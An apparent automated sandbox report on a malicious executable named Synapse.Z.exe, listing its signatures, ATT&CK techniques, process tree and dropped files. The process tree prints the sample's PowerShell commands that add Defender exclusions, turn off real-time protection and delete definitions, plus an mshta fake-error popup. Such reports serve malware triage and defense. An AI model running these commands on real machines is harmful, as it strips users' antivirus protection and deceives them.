02a802ac33889f32fa8792832883bc8f3e2da2fdbede78626127f8afe3b5e4a2

Analysis

max time kernel
152s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
29/09/2024, 09:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Synapse.Z.exe
Size

712.0MB
MD5

e7bda1f1b3150e1436adfa87bbe25307
SHA1

d5056028f468c1cf95d8aa38b1522c67c99ca97b
SHA256

02a802ac33889f32fa8792832883bc8f3e2da2fdbede78626127f8afe3b5e4a2
SHA512

b51a01700c71df2b5333696154105300ce5cce4f1ac5b3ff6c8112e2b866915e4e1b4cbdaf590910b577890088a5ab699bc77ad475823a1da1760ee915393ea1
SSDEEP

98304:ahSi8x9XQsD91urErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4EAKhOC1I:aIP9VD3urErvI9pWjgfPvzm6gsFE14AI

Score

8^/10

discovery execution upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1540	powershell.exe
3348	powershell.exe

Loads dropped DLL 17 IoCs

pid	Process
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe
2304	Synapse.Z.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
4692	tasklist.exe

UPX packed file 52 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023c97-21.dat	upx
behavioral1/memory/2304-25-0x00007FFE4E1A0000-0x00007FFE4E792000-memory.dmp	upx
behavioral1/files/0x000e000000023b47-27.dat	upx
behavioral1/files/0x0007000000023c95-31.dat	upx
behavioral1/memory/2304-30-0x00007FFE62110000-0x00007FFE62134000-memory.dmp	upx
behavioral1/memory/2304-48-0x00007FFE62050000-0x00007FFE6205F000-memory.dmp	upx
behavioral1/files/0x0007000000023c91-47.dat	upx
behavioral1/files/0x0007000000023c90-46.dat	upx
behavioral1/files/0x0007000000023c8f-45.dat	upx
behavioral1/files/0x0007000000023c8e-44.dat	upx
behavioral1/files/0x0007000000023c8d-43.dat	upx
behavioral1/files/0x0007000000023c8c-42.dat	upx
behavioral1/files/0x000c000000023ba2-41.dat	upx
behavioral1/files/0x0003000000022aaa-40.dat	upx
behavioral1/files/0x0007000000023c9c-39.dat	upx
behavioral1/files/0x0007000000023c9b-38.dat	upx
behavioral1/files/0x0007000000023c9a-37.dat	upx
behavioral1/files/0x0007000000023c96-34.dat	upx
behavioral1/files/0x0007000000023c94-33.dat	upx
behavioral1/memory/2304-54-0x00007FFE54FD0000-0x00007FFE54FFD000-memory.dmp	upx
behavioral1/memory/2304-56-0x00007FFE5A520000-0x00007FFE5A539000-memory.dmp	upx
behavioral1/memory/2304-58-0x00007FFE4FB70000-0x00007FFE4FB93000-memory.dmp	upx
behavioral1/memory/2304-60-0x00007FFE4DE20000-0x00007FFE4DF9E000-memory.dmp	upx
behavioral1/memory/2304-64-0x00007FFE57700000-0x00007FFE5770D000-memory.dmp	upx
behavioral1/memory/2304-62-0x00007FFE59DF0000-0x00007FFE59E09000-memory.dmp	upx
behavioral1/memory/2304-66-0x00007FFE4F440000-0x00007FFE4F473000-memory.dmp	upx
behavioral1/memory/2304-73-0x00007FFE62110000-0x00007FFE62134000-memory.dmp	upx
behavioral1/memory/2304-72-0x00007FFE4D8F0000-0x00007FFE4DE19000-memory.dmp	upx
behavioral1/memory/2304-70-0x00007FFE4F140000-0x00007FFE4F20D000-memory.dmp	upx
behavioral1/memory/2304-69-0x00007FFE4E1A0000-0x00007FFE4E792000-memory.dmp	upx
behavioral1/memory/2304-77-0x00007FFE55680000-0x00007FFE55694000-memory.dmp	upx
behavioral1/memory/2304-80-0x00007FFE4FB60000-0x00007FFE4FB6D000-memory.dmp	upx
behavioral1/memory/2304-83-0x00007FFE4D7D0000-0x00007FFE4D8EC000-memory.dmp	upx
behavioral1/memory/2304-82-0x00007FFE4FB70000-0x00007FFE4FB93000-memory.dmp	upx
behavioral1/memory/2304-79-0x00007FFE5A520000-0x00007FFE5A539000-memory.dmp	upx
behavioral1/memory/2304-76-0x00007FFE54FD0000-0x00007FFE54FFD000-memory.dmp	upx
behavioral1/memory/2304-104-0x00007FFE4DE20000-0x00007FFE4DF9E000-memory.dmp	upx
behavioral1/memory/2304-116-0x00007FFE4DE20000-0x00007FFE4DF9E000-memory.dmp	upx
behavioral1/memory/2304-121-0x00007FFE4D8F0000-0x00007FFE4DE19000-memory.dmp	upx
behavioral1/memory/2304-120-0x00007FFE4F140000-0x00007FFE4F20D000-memory.dmp	upx
behavioral1/memory/2304-119-0x00007FFE4F440000-0x00007FFE4F473000-memory.dmp	upx
behavioral1/memory/2304-124-0x00007FFE4D7D0000-0x00007FFE4D8EC000-memory.dmp	upx
behavioral1/memory/2304-123-0x00007FFE4FB60000-0x00007FFE4FB6D000-memory.dmp	upx
behavioral1/memory/2304-122-0x00007FFE55680000-0x00007FFE55694000-memory.dmp	upx
behavioral1/memory/2304-118-0x00007FFE57700000-0x00007FFE5770D000-memory.dmp	upx
behavioral1/memory/2304-117-0x00007FFE59DF0000-0x00007FFE59E09000-memory.dmp	upx
behavioral1/memory/2304-115-0x00007FFE4FB70000-0x00007FFE4FB93000-memory.dmp	upx
behavioral1/memory/2304-114-0x00007FFE5A520000-0x00007FFE5A539000-memory.dmp	upx
behavioral1/memory/2304-113-0x00007FFE54FD0000-0x00007FFE54FFD000-memory.dmp	upx
behavioral1/memory/2304-112-0x00007FFE62050000-0x00007FFE6205F000-memory.dmp	upx
behavioral1/memory/2304-111-0x00007FFE62110000-0x00007FFE62134000-memory.dmp	upx
behavioral1/memory/2304-110-0x00007FFE4E1A0000-0x00007FFE4E792000-memory.dmp	upx

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1540	powershell.exe
1540	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
1540	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	4692	tasklist.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeIncreaseQuotaPrivilege	2500	WMIC.exe
Token: SeSecurityPrivilege	2500	WMIC.exe
Token: SeTakeOwnershipPrivilege	2500	WMIC.exe
Token: SeLoadDriverPrivilege	2500	WMIC.exe
Token: SeSystemProfilePrivilege	2500	WMIC.exe
Token: SeSystemtimePrivilege	2500	WMIC.exe
Token: SeProfSingleProcessPrivilege	2500	WMIC.exe
Token: SeIncBasePriorityPrivilege	2500	WMIC.exe
Token: SeCreatePagefilePrivilege	2500	WMIC.exe
Token: SeBackupPrivilege	2500	WMIC.exe
Token: SeRestorePrivilege	2500	WMIC.exe
Token: SeShutdownPrivilege	2500	WMIC.exe
Token: SeDebugPrivilege	2500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2500	WMIC.exe
Token: SeRemoteShutdownPrivilege	2500	WMIC.exe
Token: SeUndockPrivilege	2500	WMIC.exe
Token: SeManageVolumePrivilege	2500	WMIC.exe
Token: 33	2500	WMIC.exe
Token: 34	2500	WMIC.exe
Token: 35	2500	WMIC.exe
Token: 36	2500	WMIC.exe
Token: SeDebugPrivilege	3348	powershell.exe
Token: SeIncreaseQuotaPrivilege	2500	WMIC.exe
Token: SeSecurityPrivilege	2500	WMIC.exe
Token: SeTakeOwnershipPrivilege	2500	WMIC.exe
Token: SeLoadDriverPrivilege	2500	WMIC.exe
Token: SeSystemProfilePrivilege	2500	WMIC.exe
Token: SeSystemtimePrivilege	2500	WMIC.exe
Token: SeProfSingleProcessPrivilege	2500	WMIC.exe
Token: SeIncBasePriorityPrivilege	2500	WMIC.exe
Token: SeCreatePagefilePrivilege	2500	WMIC.exe
Token: SeBackupPrivilege	2500	WMIC.exe
Token: SeRestorePrivilege	2500	WMIC.exe
Token: SeShutdownPrivilege	2500	WMIC.exe
Token: SeDebugPrivilege	2500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2500	WMIC.exe
Token: SeRemoteShutdownPrivilege	2500	WMIC.exe
Token: SeUndockPrivilege	2500	WMIC.exe
Token: SeManageVolumePrivilege	2500	WMIC.exe
Token: 33	2500	WMIC.exe
Token: 34	2500	WMIC.exe
Token: 35	2500	WMIC.exe
Token: 36	2500	WMIC.exe
Token: SeDebugPrivilege	2548	firefox.exe
Token: SeDebugPrivilege	2548	firefox.exe
Token: SeDebugPrivilege	2548	firefox.exe
Token: SeDebugPrivilege	2548	firefox.exe
Token: SeDebugPrivilege	2548	firefox.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe
2548	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3632 wrote to memory of 2304	3632	Synapse.Z.exe	90
PID 3632 wrote to memory of 2304	3632	Synapse.Z.exe	90
PID 2304 wrote to memory of 1828	2304	Synapse.Z.exe	92
PID 2304 wrote to memory of 1828	2304	Synapse.Z.exe	92
PID 2304 wrote to memory of 4316	2304	Synapse.Z.exe	93
PID 2304 wrote to memory of 4316	2304	Synapse.Z.exe	93
PID 2304 wrote to memory of 4616	2304	Synapse.Z.exe	94
PID 2304 wrote to memory of 4616	2304	Synapse.Z.exe	94
PID 2304 wrote to memory of 3860	2304	Synapse.Z.exe	98
PID 2304 wrote to memory of 3860	2304	Synapse.Z.exe	98
PID 1828 wrote to memory of 1540	1828	cmd.exe	100
PID 1828 wrote to memory of 1540	1828	cmd.exe	100
PID 2304 wrote to memory of 3084	2304	Synapse.Z.exe	101
PID 2304 wrote to memory of 3084	2304	Synapse.Z.exe	101
PID 3860 wrote to memory of 4692	3860	cmd.exe	103
PID 3860 wrote to memory of 4692	3860	cmd.exe	103
PID 4616 wrote to memory of 1288	4616	cmd.exe	104
PID 4616 wrote to memory of 1288	4616	cmd.exe	104
PID 4316 wrote to memory of 3348	4316	cmd.exe	105
PID 4316 wrote to memory of 3348	4316	cmd.exe	105
PID 3084 wrote to memory of 2500	3084	cmd.exe	106
PID 3084 wrote to memory of 2500	3084	cmd.exe	106
PID 3892 wrote to memory of 2548	3892	firefox.exe	120
PID 3892 wrote to memory of 2548	3892	firefox.exe	120
PID 3892 wrote to memory of 2548	3892	firefox.exe	120
PID 3892 wrote to memory of 2548	3892	firefox.exe	120
PID 3892 wrote to memory of 2548	3892	firefox.exe	120
PID 3892 wrote to memory of 2548	3892	firefox.exe	120
PID 3892 wrote to memory of 2548	3892	firefox.exe	120
PID 3892 wrote to memory of 2548	3892	firefox.exe	120
PID 3892 wrote to memory of 2548	3892	firefox.exe	120
PID 3892 wrote to memory of 2548	3892	firefox.exe	120
PID 3892 wrote to memory of 2548	3892	firefox.exe	120
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121
PID 2548 wrote to memory of 4404	2548	firefox.exe	121

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Synapse.Z.exe
"C:\Users\Admin\AppData\Local\Temp\Synapse.Z.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3632
- C:\Users\Admin\AppData\Local\Temp\Synapse.Z.exe
  "C:\Users\Admin\AppData\Local\Temp\Synapse.Z.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Synapse.Z.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Synapse.Z.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Incompatible Windows Version. This software is intended for (Windows 11 Server). If you feel that this is a mistake please contact Microsoft Support.', 0, 'Error Invalid Windows Version', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4616
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Incompatible Windows Version. This software is intended for (Windows 11 Server). If you feel that this is a mistake please contact Microsoft Support.', 0, 'Error Invalid Windows Version', 0+16);close()"
      4⤵
      PID:1288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3860
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2500

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3592

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3892
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2548
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1e6a8b2-04ca-4f15-984a-904381d456c1} 2548 "\\.\pipe\gecko-crash-server-pipe.2548" gpu
    3⤵
    PID:4404
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2404 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2384 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29a1a1bb-3df5-48cc-b614-410e823ff935} 2548 "\\.\pipe\gecko-crash-server-pipe.2548" socket
    3⤵
    PID:1288
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3080 -childID 1 -isForBrowser -prefsHandle 2968 -prefMapHandle 2964 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1116 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {370033a8-ca7a-4b5b-ba20-e19412566d95} 2548 "\\.\pipe\gecko-crash-server-pipe.2548" tab
    3⤵
    PID:2148
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3692 -childID 2 -isForBrowser -prefsHandle 3712 -prefMapHandle 3708 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1116 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e108e081-7a9a-42dc-8b97-248a3bb4bd4a} 2548 "\\.\pipe\gecko-crash-server-pipe.2548" tab
    3⤵
    PID:3592
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4988 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4980 -prefMapHandle 4976 -prefsLen 29144 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43c2b7b1-e04e-4927-b205-0cd899617103} 2548 "\\.\pipe\gecko-crash-server-pipe.2548" utility
    3⤵
    - Checks processor information in registry
    PID:5796
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5304 -childID 3 -isForBrowser -prefsHandle 5296 -prefMapHandle 5288 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1116 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e533983-d5c1-414b-854f-0f53bb730150} 2548 "\\.\pipe\gecko-crash-server-pipe.2548" tab
    3⤵
    PID:6068
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5528 -childID 4 -isForBrowser -prefsHandle 5448 -prefMapHandle 5456 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1116 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d57ae9cb-37e9-4990-b445-2bf311c73765} 2548 "\\.\pipe\gecko-crash-server-pipe.2548" tab
    3⤵
    PID:6080
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5720 -childID 5 -isForBrowser -prefsHandle 5640 -prefMapHandle 5648 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1116 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ee374f7-5727-4185-b316-7acc847c889d} 2548 "\\.\pipe\gecko-crash-server-pipe.2548" tab
    3⤵
    PID:6092
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6132 -childID 6 -isForBrowser -prefsHandle 6096 -prefMapHandle 5184 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1116 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7fecb685-0111-43e4-9419-c255ed9a8865} 2548 "\\.\pipe\gecko-crash-server-pipe.2548" tab
    3⤵
    PID:5768
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6152 -parentBuildID 20240401114208 -prefsHandle 6308 -prefMapHandle 4752 -prefsLen 30532 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d874f4e-31f8-4239-9135-1594755c628c} 2548 "\\.\pipe\gecko-crash-server-pipe.2548" rdd
    3⤵
    PID:5704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yeb58ys6.default-release\activity-stream.discovery_stream.json

Filesize
30KB

MD5
ec75e9a7d92f1b68bcd35f58efe9d2ab

SHA1
973740a2fed197103197d001c04aa46e75e3d855

SHA256
5ac4b5a2796d7151c1722f3739f9c8a26b5b05018be5ae85b5a0622a1701bd14

SHA512
536702cce2c41813656d25ce281522ce5f65dad48d14c42eec62bf1c69342ca07073b5ffbfefc7e5d071d93bb698fd17809efe10446dc4a5160370a028d5cb2b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yeb58ys6.default-release\cache2\entries\B5D48F10F1D9023D8F61F27AE2FC81B692305979

Filesize
61KB

MD5
fa98e4891901b447fa6a6d8c5a41b5f0

SHA1
68a13a634e62e65045cd81defe6e330b82646c2e

SHA256
7d2354aac9ade37849cdd98c8c0fd1ba38fcfb26d1133941ae2a33e80a746232

SHA512
16d038f5fbecc74578e78dd44dba919ac44d6e305a31dc23185770017d2eb2e560095c1b272613c59ebb9a9ea6ed4ec023c48fc09399b9fbff988e8595ed5a28

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yeb58ys6.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
7KB

MD5
c460716b62456449360b23cf5663f275

SHA1
06573a83d88286153066bae7062cc9300e567d92

SHA256
0ec0f16f92d876a9c1140d4c11e2b346a9292984d9a854360e54e99fdcd99cc0

SHA512
476bc3a333aace4c75d9a971ef202d5889561e10d237792ca89f8d379280262ce98cf3d4728460696f8d7ff429a508237764bf4a9ccb59fd615aee07bdcadf30

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36322\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36322\_bz2.pyd

Filesize
48KB

MD5
3bd0dd2ed98fca486ec23c42a12978a8

SHA1
63df559f4f1a96eb84028dc06eaeb0ef43551acd

SHA256
6beb733f2e27d25617d880559299fbebd6a9dac51d6a9d0ab14ae6df9877da07

SHA512
9ffa7da0e57d98b8fd6b71bc5984118ea0b23bf11ea3f377dabb45b42f2c8757216bc38ddd05b50c0bc1c69c23754319cef9ffc662d4199f7c7e038a0fb18254

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36322\_ctypes.pyd

Filesize
58KB

MD5
343e1a85da03e0f80137719d48babc0f

SHA1
0702ba134b21881737585f40a5ddc9be788bab52

SHA256
7b68a4ba895d7bf605a4571d093ae3190eac5e813a9eb131285ae74161d6d664

SHA512
1b29efad26c0a536352bf8bb176a7fe9294e616cafb844c6d861561e59fbda35e1f7c510b42e8ed375561a5e1d2392b42f6021acc43133a27ae4b7006e465ba8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36322\_decimal.pyd

Filesize
107KB

MD5
8b623d42698bf8a7602243b4be1f775d

SHA1
f9116f4786b5687a03c75d960150726843e1bc25

SHA256
7c2f0a65e38179170dc69e1958e7d21e552eca46fcf62bbb842b4f951a86156c

SHA512
